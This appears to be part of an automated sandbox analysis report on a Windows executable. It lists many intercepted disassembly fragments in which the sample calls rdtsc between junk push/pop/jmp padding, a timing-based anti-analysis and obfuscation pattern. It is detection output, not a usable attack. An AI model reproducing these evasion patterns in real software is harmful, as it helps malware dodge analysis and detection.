              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB5506 second address: DB550F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB550F second address: DB5515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB5515 second address: DB5530 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAC2C5039B2h 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBB7CC second address: DBB7DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FAC2CCCA0D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBB907 second address: DBB90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC0685 second address: DC06A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007FAC2CCCA0D6h 0x00000009 pop eax 0x0000000a push edx 0x0000000b js 00007FAC2CCCA0D6h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop edx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jo 00007FAC2CCCA0E4h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC06A5 second address: DC06A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC1DD9 second address: DC1DE5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FAC2CCCA0D6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC1DE5 second address: DC1DF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007FAC2C5039A6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC1DF9 second address: DC1DFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC1DFD second address: DC1E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC1E03 second address: DC1E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FAC2CCCA0DAh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA66C second address: DCA673 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA673 second address: DCA687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FAC2CCCA0D6h 0x0000000a popad 0x0000000b pushad 0x0000000c jg 00007FAC2CCCA0D6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD2F39 second address: DD2F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD2F3D second address: DD2F45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD2F45 second address: DD2F4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD2F4B second address: DD2F4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD30CB second address: DD30DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FAC2C5039A6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD33EE second address: DD340A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAC2CCCA0E2h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE5B98 second address: DE5B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE5B9C second address: DE5BA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE5BA0 second address: DE5BBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAC2C5039B3h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE5BBB second address: DE5BBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7F36 second address: DE7F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FAC2C5039A6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7F40 second address: DE7F5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FAC2CCCA0E3h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF58EA second address: DF58EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF58EE second address: DF5911 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0DEh 0x00000007 js 00007FAC2CCCA0D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jg 00007FAC2CCCA0D6h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF5911 second address: DF5916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF5916 second address: DF592E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 ja 00007FAC2CCCA0D6h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAC2CCCA0DCh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF79FE second address: DF7A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF7A03 second address: DF7A09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF7A09 second address: DF7A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF7A0D second address: DF7A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF7A11 second address: DF7A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF75A0 second address: DF75A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF90D0 second address: DF90D6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E10680 second address: E106B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FAC2CCCA0DCh 0x00000011 jnp 00007FAC2CCCA0D6h 0x00000017 jmp 00007FAC2CCCA0DCh 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E10936 second address: E10974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FAC2C5039AFh 0x0000000a jns 00007FAC2C5039B3h 0x00000010 pushad 0x00000011 jnl 00007FAC2C5039A6h 0x00000017 jno 00007FAC2C5039A6h 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 popad 0x00000023 push edx 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E150F7 second address: E150FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1548F second address: E1549F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1549F second address: E154BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FAC2CCCA0D6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007FAC2CCCA0DCh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E154BD second address: E154DD instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAC2C5039A8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FAC2C5039AEh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A908 second address: D2A90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5180408 second address: 518043D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 pushfd 0x00000007 jmp 00007FAC2C5039ADh 0x0000000c or si, D296h 0x00000011 jmp 00007FAC2C5039B1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518043D second address: 5180441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5180441 second address: 5180447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518049F second address: 51804B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51804B4 second address: 51804B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A052D second address: 51A053F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAC2CCCA0DEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A053F second address: 51A0577 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FAC2C5039B6h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 mov cx, dx 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push edi 0x0000001d pop ecx 0x0000001e push ebx 0x0000001f pop eax 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0577 second address: 51A05CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 0D10C1E6h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ecx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FAC2CCCA0E3h 0x00000015 or ecx, 171FFC6Eh 0x0000001b jmp 00007FAC2CCCA0E9h 0x00000020 popfd 0x00000021 pushad 0x00000022 mov cx, E2CDh 0x00000026 popad 0x00000027 popad 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FAC2CCCA0DBh 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A05CF second address: 51A05D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A05D5 second address: 51A05D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A05D9 second address: 51A0692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b jmp 00007FAC2C5039B7h 0x00000010 lea eax, dword ptr [ebp-04h] 0x00000013 jmp 00007FAC2C5039B6h 0x00000018 nop 0x00000019 jmp 00007FAC2C5039B0h 0x0000001e push eax 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FAC2C5039B1h 0x00000026 or ax, B0C6h 0x0000002b jmp 00007FAC2C5039B1h 0x00000030 popfd 0x00000031 pushfd 0x00000032 jmp 00007FAC2C5039B0h 0x00000037 and al, 00000068h 0x0000003a jmp 00007FAC2C5039ABh 0x0000003f popfd 0x00000040 popad 0x00000041 nop 0x00000042 jmp 00007FAC2C5039B6h 0x00000047 push dword ptr [ebp+08h] 0x0000004a pushad 0x0000004b movzx eax, bx 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A00AD second address: 51A00E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 3D55216Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FAC2CCCA0DEh 0x00000019 or ecx, 46E50A58h 0x0000001f jmp 00007FAC2CCCA0DBh 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A00E8 second address: 51A0110 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov di, FF46h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push 0423CD44h 0x00000011 jmp 00007FAC2C5039AAh 0x00000016 xor dword ptr [esp], 72B6E634h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0110 second address: 51A0114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0114 second address: 51A0131 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0131 second address: 51A015D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 mov cl, dh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr fs:[00000000h] 0x00000010 jmp 00007FAC2CCCA0E2h 0x00000015 nop 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov bl, 3Fh 0x0000001b movzx ecx, bx 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A015D second address: 51A0178 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0178 second address: 51A017E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A017E second address: 51A0184 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0184 second address: 51A0188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0188 second address: 51A01EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007FAC2C5039AEh 0x00000011 sub esp, 18h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FAC2C5039ADh 0x0000001d adc esi, 53EE1CD6h 0x00000023 jmp 00007FAC2C5039B1h 0x00000028 popfd 0x00000029 jmp 00007FAC2C5039B0h 0x0000002e popad 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A01EB second address: 51A025C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FAC2CCCA0E1h 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebx 0x0000000d jmp 00007FAC2CCCA0DAh 0x00000012 push eax 0x00000013 jmp 00007FAC2CCCA0DBh 0x00000018 xchg eax, ebx 0x00000019 jmp 00007FAC2CCCA0E6h 0x0000001e xchg eax, esi 0x0000001f jmp 00007FAC2CCCA0E0h 0x00000024 push eax 0x00000025 pushad 0x00000026 mov si, di 0x00000029 jmp 00007FAC2CCCA0DDh 0x0000002e popad 0x0000002f xchg eax, esi 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A025C second address: 51A0262 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A0262 second address: 51A029C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 6FC7h 0x00000007 mov cx, 4163h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, edi 0x0000000f jmp 00007FAC2CCCA0E6h 0x00000014 push eax 0x00000015 jmp 00007FAC2CCCA0DBh 0x0000001a xchg eax, edi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ah, dh 0x00000020 mov cl, EDh 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A029C second address: 51A02B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAC2C5039B5h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A02B5 second address: 51A02B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A02B9 second address: 51A033F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [769B4538h] 0x0000000d jmp 00007FAC2C5039ADh 0x00000012 xor dword ptr [ebp-08h], eax 0x00000015 pushad 0x00000016 mov bx, si 0x00000019 mov ecx, 732E3E5Fh 0x0000001e popad 0x0000001f xor eax, ebp 0x00000021 jmp 00007FAC2C5039ABh 0x00000026 nop 0x00000027 pushad 0x00000028 call 00007FAC2C5039B4h 0x0000002d pushfd 0x0000002e jmp 00007FAC2C5039B2h 0x00000033 adc ax, 2D28h 0x00000038 jmp 00007FAC2C5039ABh 0x0000003d popfd 0x0000003e pop eax 0x0000003f mov eax, edx 0x00000041 popad 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007FAC2C5039B1h 0x0000004a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A033F second address: 51A03A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2CCCA0E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FAC2CCCA0DEh 0x0000000f lea eax, dword ptr [ebp-10h] 0x00000012 jmp 00007FAC2CCCA0E0h 0x00000017 mov dword ptr fs:[00000000h], eax 0x0000001d jmp 00007FAC2CCCA0E0h 0x00000022 mov dword ptr [ebp-18h], esp 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FAC2CCCA0E7h 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A03A8 second address: 51A046B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 2810959Ah 0x00000008 mov esi, edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr fs:[00000018h] 0x00000013 jmp 00007FAC2C5039ADh 0x00000018 mov ecx, dword ptr [eax+00000FDCh] 0x0000001e pushad 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FAC2C5039AAh 0x00000026 xor cx, 0908h 0x0000002b jmp 00007FAC2C5039ABh 0x00000030 popfd 0x00000031 mov edx, esi 0x00000033 popad 0x00000034 movzx esi, dx 0x00000037 popad 0x00000038 test ecx, ecx 0x0000003a jmp 00007FAC2C5039B7h 0x0000003f jns 00007FAC2C5039E3h 0x00000045 pushad 0x00000046 mov cl, 60h 0x00000048 pushfd 0x00000049 jmp 00007FAC2C5039B1h 0x0000004e sbb ax, 7D86h 0x00000053 jmp 00007FAC2C5039B1h 0x00000058 popfd 0x00000059 popad 0x0000005a add eax, ecx 0x0000005c jmp 00007FAC2C5039AEh 0x00000061 mov ecx, dword ptr [ebp+08h] 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007FAC2C5039B7h 0x0000006b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51A046B second address: 51A0472 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51901C6 second address: 519020D instructions: 0x00000000 rdtsc 0x00000002 mov eax, 10692E85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov cx, 2E01h 0x0000000d popad 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 pushad 0x00000011 mov si, 73DFh 0x00000015 push ecx 0x00000016 pop edi 0x00000017 popad 0x00000018 pushfd 0x00000019 jmp 00007FAC2C5039B0h 0x0000001e jmp 00007FAC2C5039B5h 0x00000023 popfd 0x00000024 popad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519020D second address: 5190211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5190211 second address: 519022B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519022B second address: 519023D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAC2CCCA0DEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519023D second address: 51902A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FAC2C5039B6h 0x00000011 mov ebp, esp 0x00000013 jmp 00007FAC2C5039B0h 0x00000018 sub esp, 2Ch 0x0000001b jmp 00007FAC2C5039B0h 0x00000020 xchg eax, ebx 0x00000021 jmp 00007FAC2C5039B0h 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51902A2 second address: 51902A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51902A6 second address: 51902C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAC2C5039B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
